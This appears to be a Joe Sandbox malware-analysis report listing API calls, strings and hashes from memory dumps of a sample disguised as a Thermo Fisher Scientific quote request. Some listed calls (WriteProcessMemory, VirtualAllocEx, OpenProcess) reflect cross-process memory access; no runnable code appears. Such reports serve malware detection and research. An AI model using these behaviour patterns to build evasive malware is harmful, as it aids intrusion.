                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063197417.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                               • Associated: 00000000.00000002.2063180078.0000000000600000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2063243986.000000000068D000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2063243986.00000000006AE000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2063285271.00000000006BA000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2063304464.00000000006C4000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_600000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID: BeepDialogItemKillMessageTextTimerWindow
                                                              • String ID:
                                                              • API String ID: 3741023627-0
                                                              • Opcode ID: d82d3d14692342156a9b10a60de09b5a91167542d4db565c88a9ae23307a27b3
                                                              • Instruction ID: 1460e422c9a30f1eba178d823d5ac63b010e54e936cb9470792b2eb4435d249a
                                                              • Opcode Fuzzy Hash: d82d3d14692342156a9b10a60de09b5a91167542d4db565c88a9ae23307a27b3
                                                              • Instruction Fuzzy Hash: 4701A430940704ABEB245B50DE4EFDA77BAFF00705F002659B593B14E1DBF5AA85CBA0
                                                              APIs
                                                              • EndPath.GDI32(?), ref: 0061B0BA
                                                              • StrokeAndFillPath.GDI32(?,?,0067E680,00000000,?,?,?), ref: 0061B0D6
                                                              • SelectObject.GDI32(?,00000000), ref: 0061B0E9
                                                              • DeleteObject.GDI32 ref: 0061B0FC
                                                              • StrokePath.GDI32(?), ref: 0061B117
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063197417.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                               • Associated: 00000000.00000002.2063180078.0000000000600000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2063243986.000000000068D000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2063243986.00000000006AE000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2063285271.00000000006BA000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2063304464.00000000006C4000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_600000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID: Path$ObjectStroke$DeleteFillSelect
                                                              • String ID:
                                                              • API String ID: 2625713937-0
                                                              • Opcode ID: d64407a18d628766a40cbbaefc724902ed90561568f6583c2be000a9c0191080
                                                              • Instruction ID: a559dd46ae48eb1965a7f3171528e633c9c232cd326a571e099a793af484ae37
                                                              • Opcode Fuzzy Hash: d64407a18d628766a40cbbaefc724902ed90561568f6583c2be000a9c0191080
                                                              • Instruction Fuzzy Hash: B4F0C930000244EFDB21AF66EC0DBA53B67AB12366F18A315E465891F2C7358AA6DF60
                                                              APIs
                                                              • CoInitialize.OLE32(00000000), ref: 0064F2DA
                                                              • CoCreateInstance.OLE32(0068DA7C,00000000,00000001,0068D8EC,?), ref: 0064F2F2
                                                              • CoUninitialize.OLE32 ref: 0064F555
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063197417.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                               • Associated: 00000000.00000002.2063180078.0000000000600000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2063243986.000000000068D000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2063243986.00000000006AE000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2063285271.00000000006BA000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2063304464.00000000006C4000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_600000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID: CreateInitializeInstanceUninitialize
                                                              • String ID: .lnk
                                                              • API String ID: 948891078-24824748
                                                              • Opcode ID: 4d9bd12ec371352238ab2113e94bcd3e0dbd3ccc2971ff4c83e5f92455e036a8
                                                              • Instruction ID: aa6d47080dbb9608041997052fb40438c7e311b7a335efff542a9a0321a17eda
                                                              • Opcode Fuzzy Hash: 4d9bd12ec371352238ab2113e94bcd3e0dbd3ccc2971ff4c83e5f92455e036a8
                                                              • Instruction Fuzzy Hash: 84A15CB1104201AFD344EF64C891EAFB7EEEF98314F004A1DF55597192EB70EA49CBA6
                                                              APIs
                                                                • Part of subcall function 0060660F: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,006053B1,?,?,006061FF,?,00000000,00000001,00000000), ref: 0060662F
                                                              • CoInitialize.OLE32(00000000), ref: 0064E85D
                                                              • CoCreateInstance.OLE32(0068DA7C,00000000,00000001,0068D8EC,?), ref: 0064E876
                                                              • CoUninitialize.OLE32 ref: 0064E893
                                                                • Part of subcall function 0060936C: __swprintf.LIBCMT ref: 006093AB
                                                                • Part of subcall function 0060936C: __itow.LIBCMT ref: 006093DF
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063197417.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                               • Associated: 00000000.00000002.2063180078.0000000000600000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2063243986.000000000068D000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2063243986.00000000006AE000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2063285271.00000000006BA000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2063304464.00000000006C4000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_600000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID: CreateFullInitializeInstanceNamePathUninitialize__itow__swprintf
                                                              • String ID: .lnk
                                                              • API String ID: 2126378814-24824748
                                                              • Opcode ID: 899ea7fe9f30a2137297c77731523d1b9aa276e2c88e67fbf5a4bc9fdc6e54ea
                                                              • Instruction ID: ae8aeabb1122947c49e346ece8bb01ad1bd36ad114f82d8f335e9b997c239c00
                                                              • Opcode Fuzzy Hash: 899ea7fe9f30a2137297c77731523d1b9aa276e2c88e67fbf5a4bc9fdc6e54ea
                                                              • Instruction Fuzzy Hash: E3A135756043019FCB54EF24C484D6ABBE6BF89310F14899CF9969B3A2CB32ED45CB91
                                                              APIs
                                                              • __startOneArgErrorHandling.LIBCMT ref: 006232ED
                                                                • Part of subcall function 0062E0D0: __87except.LIBCMT ref: 0062E10B
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063197417.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                               • Associated: 00000000.00000002.2063180078.0000000000600000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2063243986.000000000068D000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2063243986.00000000006AE000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2063285271.00000000006BA000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2063304464.00000000006C4000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_600000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID: ErrorHandling__87except__start
                                                              • String ID: pow
                                                              • API String ID: 2905807303-2276729525
                                                              • Opcode ID: 664261a5a2d6ee97f02f2f7cb125a62ae4e274f6f868cfdb3cbbb74893bbd1a1
                                                              • Instruction ID: d8268ae33c14bf277a28a40eabdc8898b8869a9198892a804f300f19c47beb56
                                                              • Opcode Fuzzy Hash: 664261a5a2d6ee97f02f2f7cb125a62ae4e274f6f868cfdb3cbbb74893bbd1a1
                                                              • Instruction Fuzzy Hash: 35515D31A09E32D2C715B714F9013BA3B9B9B40710F205D39E486823D9DF3A8F959E46
                                                              APIs
                                                              • CharUpperBuffW.USER32(0000000C,00000016,00000016,00000000,00000000,?,00000000,0069DC50,?,0000000F,0000000C,00000016,0069DC50,?), ref: 00644645
                                                                • Part of subcall function 0060936C: __swprintf.LIBCMT ref: 006093AB
                                                                • Part of subcall function 0060936C: __itow.LIBCMT ref: 006093DF
                                                              • CharUpperBuffW.USER32(?,?,00000000,?), ref: 006446C5
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063197417.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                               • Associated: 00000000.00000002.2063180078.0000000000600000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2063243986.000000000068D000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2063243986.00000000006AE000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2063285271.00000000006BA000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2063304464.00000000006C4000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_600000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID: BuffCharUpper$__itow__swprintf
                                                              • String ID: REMOVE$THIS
                                                              • API String ID: 3797816924-776492005
                                                              • Opcode ID: b8c3c14f662a2f51a1e576fad0a8c2020826620619aafe68732d383fe9cb8ac0
                                                              • Instruction ID: 10021a3052e1f17517727c9a2c4c9943cb9a60e5c87b6422ab8c35716d50005f
                                                              • Opcode Fuzzy Hash: b8c3c14f662a2f51a1e576fad0a8c2020826620619aafe68732d383fe9cb8ac0
                                                              • Instruction Fuzzy Hash: 22416F74A002199FCF44DFA4C882AAEB7B6FF49304F148059E956AB392DF34DD46CB54
                                                              APIs
                                                                • Part of subcall function 0064430B: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,0063BC08,?,?,00000034,00000800,?,00000034), ref: 00644335
                                                              • SendMessageW.USER32(?,00001104,00000000,00000000), ref: 0063C1D3
                                                                • Part of subcall function 006442D6: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,0063BC37,?,?,00000800,?,00001073,00000000,?,?), ref: 00644300
                                                                • Part of subcall function 0064422F: GetWindowThreadProcessId.USER32(?,?), ref: 0064425A
                                                                • Part of subcall function 0064422F: OpenProcess.KERNEL32(00000438,00000000,?,?,?,0063BBCC,00000034,?,?,00001004,00000000,00000000), ref: 0064426A
                                                                • Part of subcall function 0064422F: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,0063BBCC,00000034,?,?,00001004,00000000,00000000), ref: 00644280
                                                              • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 0063C240
                                                              • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 0063C28D
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063197417.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                               • Associated: 00000000.00000002.2063180078.0000000000600000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2063243986.000000000068D000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2063243986.00000000006AE000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2063285271.00000000006BA000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2063304464.00000000006C4000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_600000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
                                                              • String ID: @
                                                              • API String ID: 4150878124-2766056989
                                                              • Opcode ID: eb5ef6d410e87245a0603e8d3bd1ab5c01f358beb5c3afd2401898e10d6c1154
                                                              • Instruction ID: f2dc4870e32c32f237faf612844bda908958ce48e45445c221cf217e5778ebbc
                                                              • Opcode Fuzzy Hash: eb5ef6d410e87245a0603e8d3bd1ab5c01f358beb5c3afd2401898e10d6c1154
                                                              • Instruction Fuzzy Hash: 86411B72900218BEDB11DFA4CD82AEEB779BF09710F004199FA45B7181DA71AF85CBA1
                                                              APIs
                                                              • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,0069DC00,00000000,?,?,?,?), ref: 0066A6D8
                                                              • GetWindowLongW.USER32 ref: 0066A6F5
                                                              • SetWindowLongW.USER32(?,000000F0,00000000), ref: 0066A705
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063197417.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                               • Associated: 00000000.00000002.2063180078.0000000000600000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2063243986.000000000068D000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2063243986.00000000006AE000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2063285271.00000000006BA000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2063304464.00000000006C4000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_600000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID: Window$Long
                                                              • String ID: SysTreeView32
                                                              • API String ID: 847901565-1698111956
                                                              • Opcode ID: 67f2f043e234ee3fd4e3c2892a2c32e8158b887a4592c7f96f73fd7ca21ea235
                                                              • Instruction ID: 6b0ce814b26452fa891bbf0d669d6b74ab9c33529905ddf68ea120ea13a8c936
                                                              • Opcode Fuzzy Hash: 67f2f043e234ee3fd4e3c2892a2c32e8158b887a4592c7f96f73fd7ca21ea235
                                                              • Instruction Fuzzy Hash: A431B035100205ABDB118F74CC41BEA7BAAEF49324F244719F875E32E1C770A8508B94
                                                              APIs
                                                              • _memset.LIBCMT ref: 00655190
                                                              • InternetCrackUrlW.WININET(?,00000000,00000000,?), ref: 006551C6
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063197417.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                               • Associated: 00000000.00000002.2063180078.0000000000600000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2063243986.000000000068D000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2063243986.00000000006AE000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2063285271.00000000006BA000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2063304464.00000000006C4000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_600000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID: CrackInternet_memset
                                                              • String ID: |$De
                                                              • API String ID: 1413715105-2705808982
                                                              • Opcode ID: dab89b8e761ea8fa90adf485ad1245d8393401c2b7dac45d19dd40bfcccf88e0
                                                              • Instruction ID: 49d7547f560e9a23db823b03f6ab845eb3587045e0ac169addba71893723f856
                                                              • Opcode Fuzzy Hash: dab89b8e761ea8fa90adf485ad1245d8393401c2b7dac45d19dd40bfcccf88e0
                                                              • Instruction Fuzzy Hash: FD313C71C00119ABCF45EFE4CD85AEE7FBAFF14710F000119F815A6166EB31AA06DBA4
                                                              APIs
                                                              • SendMessageW.USER32(00000000,00001009,00000000,?), ref: 0066A15E
                                                              • SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 0066A172
                                                              • SendMessageW.USER32(?,00001002,00000000,?), ref: 0066A196
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063197417.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                               • Associated: 00000000.00000002.2063180078.0000000000600000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2063243986.000000000068D000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2063243986.00000000006AE000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2063285271.00000000006BA000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2063304464.00000000006C4000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_600000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID: MessageSend$Window
                                                              • String ID: SysMonthCal32
                                                              • API String ID: 2326795674-1439706946
                                                              • Opcode ID: b47049639d11718af341034eacbb65a05e86498109f994b63077ef21efb4a20d
                                                              • Instruction ID: b1c3ad6a33ade584f6fe5f41fa7390a52b686d984be61f855b3c6f1f7d0e5ade
                                                              • Opcode Fuzzy Hash: b47049639d11718af341034eacbb65a05e86498109f994b63077ef21efb4a20d
                                                              • Instruction Fuzzy Hash: 05219F32510218BBDF118FA4CC42FEA3B7AEF49714F110214FA557B1D0D6B5AC55CBA0
                                                              APIs
                                                              • SendMessageW.USER32(00000000,00000469,?,00000000), ref: 0066A941
                                                              • SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 0066A94F
                                                              • DestroyWindow.USER32(00000000,00000000,?,?,?,00000000,msctls_updown32,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 0066A956
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063197417.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                               • Associated: 00000000.00000002.2063180078.0000000000600000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2063243986.000000000068D000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2063243986.00000000006AE000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2063285271.00000000006BA000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2063304464.00000000006C4000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_600000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID: MessageSend$DestroyWindow
                                                              • String ID: msctls_updown32
                                                              • API String ID: 4014797782-2298589950
                                                              • Opcode ID: a8027fe31d6013cd66980bcb67aff1c459e39e6c38ff6ddafea0779b1170fcfc
                                                              • Instruction ID: 9d15719680a30f891e98d770225552b46b0890813ac47a8d031b45a250a62771
                                                              • Opcode Fuzzy Hash: a8027fe31d6013cd66980bcb67aff1c459e39e6c38ff6ddafea0779b1170fcfc
                                                              • Instruction Fuzzy Hash: 592181B5600209BFDB10DF58CC91DB737AEEF5A354B150159FA049B3A2CA30EC518B61
                                                              APIs
                                                              • SendMessageW.USER32(00000000,00000180,00000000,?), ref: 00669A30
                                                              • SendMessageW.USER32(?,00000186,00000000,00000000), ref: 00669A40
                                                              • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 00669A65
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063197417.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                               • Associated: 00000000.00000002.2063180078.0000000000600000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2063243986.000000000068D000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2063243986.00000000006AE000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2063285271.00000000006BA000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2063304464.00000000006C4000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_600000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID: MessageSend$MoveWindow
                                                              • String ID: Listbox
                                                              • API String ID: 3315199576-2633736733
                                                              • Opcode ID: 309e944c25030803b8562d8727702e69fc796982f06a6647781203e16594d9c7
                                                              • Instruction ID: 771e2eb3a31a986172c1ffac0b1e17ed4b5500c421c4a65bd6d4c6da5f1eeb62
                                                              • Opcode Fuzzy Hash: 309e944c25030803b8562d8727702e69fc796982f06a6647781203e16594d9c7
                                                              • Instruction Fuzzy Hash: DB218372610118BFDB118F54CC85EFB3BAFEF8A760F118229F9549B290C6719C5187A0
                                                              APIs
                                                              • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 0066A46D
                                                              • SendMessageW.USER32(?,00000406,00000000,00640000), ref: 0066A482
                                                              • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 0066A48F
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063197417.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                               • Associated: 00000000.00000002.2063180078.0000000000600000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2063243986.000000000068D000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2063243986.00000000006AE000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2063285271.00000000006BA000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2063304464.00000000006C4000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_600000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID: MessageSend
                                                              • String ID: msctls_trackbar32
                                                              • API String ID: 3850602802-1010561917
                                                              • Opcode ID: 64987a33fd56be36fc630f392c592532ddda536722b6e87b50175cd769d301f4
                                                              • Instruction ID: 62547bf5ae2f12684948f0141fdfa1ca710d3c4a0a472b5ac5e430b99fa75fa6
                                                              • Opcode Fuzzy Hash: 64987a33fd56be36fc630f392c592532ddda536722b6e87b50175cd769d301f4
                                                              • Instruction Fuzzy Hash: F111A771240208BEEF245F65CC45FEB37AEEF89754F014228FA45A6191DAB2E851DB24
                                                              APIs
                                                              • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoInitialize,00622350,?), ref: 006222A1
                                                              • GetProcAddress.KERNEL32(00000000), ref: 006222A8
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063197417.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                               • Associated: 00000000.00000002.2063180078.0000000000600000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2063243986.000000000068D000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2063243986.00000000006AE000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2063285271.00000000006BA000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2063304464.00000000006C4000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_600000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID: AddressLibraryLoadProc
                                                              • String ID: RoInitialize$combase.dll
                                                              • API String ID: 2574300362-340411864
                                                              • Opcode ID: 7192db718cfd27409619976e29bf81803d4722c0a182491de6775cf6942e6a1a
                                                              • Instruction ID: 2e55fb2f2890ee4fea94edfce17a2ccd08b356cde767b36fd797c046cc7bd20c
                                                              • Opcode Fuzzy Hash: 7192db718cfd27409619976e29bf81803d4722c0a182491de6775cf6942e6a1a
                                                              • Instruction Fuzzy Hash: 64E01A70690301FBEB206FB0EC8DF643767AB04B06F106220B202D61E0CBB58080CF24
                                                              APIs
                                                              • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoUninitialize,00622276), ref: 00622376
                                                              • GetProcAddress.KERNEL32(00000000), ref: 0062237D
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063197417.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                              • Associated: 00000000.00000002.2063180078.0000000000600000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2063243986.000000000068D000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2063243986.00000000006AE000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2063285271.00000000006BA000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2063304464.00000000006C4000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_600000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID: AddressLibraryLoadProc
                                                              • String ID: RoUninitialize$combase.dll
                                                              • API String ID: 2574300362-2819208100
                                                              • Opcode ID: f8dbd0ce7d688a148134b73c25af2d4f63dc97f1f9dce394b13575f72de1f2bf
                                                              • Instruction ID: 8df56e46b907fed7dfd81bbc5f3b0a32938eb34f29eca966de96cd31ee8ad10b
                                                              • Opcode Fuzzy Hash: f8dbd0ce7d688a148134b73c25af2d4f63dc97f1f9dce394b13575f72de1f2bf
                                                              • Instruction Fuzzy Hash: 28E092B0544305FFEB20AFE1ED1DF647B67B70070AF152614F209925F0CBB894508B25
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063197417.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                              • Associated: 00000000.00000002.2063180078.0000000000600000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2063243986.000000000068D000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2063243986.00000000006AE000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2063285271.00000000006BA000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2063304464.00000000006C4000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_600000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID: LocalTime__swprintf
                                                              • String ID: %.3d$WIN_XPe
                                                              • API String ID: 2070861257-2409531811
                                                              • Opcode ID: c49b8c71822c4bdbe7d3c891db2066609f098ef064be9346f1a678db5aeb8825
                                                              • Instruction ID: 0193ab0fa5698e7af8ea14dd6518339f7678cd3d7ca742baaed0e9e2853ca1a2
                                                              • Opcode Fuzzy Hash: c49b8c71822c4bdbe7d3c891db2066609f098ef064be9346f1a678db5aeb8825
                                                              • Instruction Fuzzy Hash: 75E012B1804628FBCB6297D0DD05DFD737FA784741F144592B90AA1014D6359BC6EB27
                                                              APIs
                                                              • LoadLibraryA.KERNEL32(kernel32.dll,?,006621FB,?,006623EF), ref: 00662213
                                                              • GetProcAddress.KERNEL32(00000000,GetProcessId), ref: 00662225
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063197417.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                              • Associated: 00000000.00000002.2063180078.0000000000600000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2063243986.000000000068D000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2063243986.00000000006AE000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2063285271.00000000006BA000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2063304464.00000000006C4000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_600000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID: AddressLibraryLoadProc
                                                              • String ID: GetProcessId$kernel32.dll
                                                              • API String ID: 2574300362-399901964
                                                              • Opcode ID: f0f5b70e9625fc880df65af405f015dac5b8bea762413aaf9b52470778c19cc9
                                                              • Instruction ID: c9dc7913f1ba11a804579ece5e300058bfd7e479e2ff5cb95b7ab30f51916e45
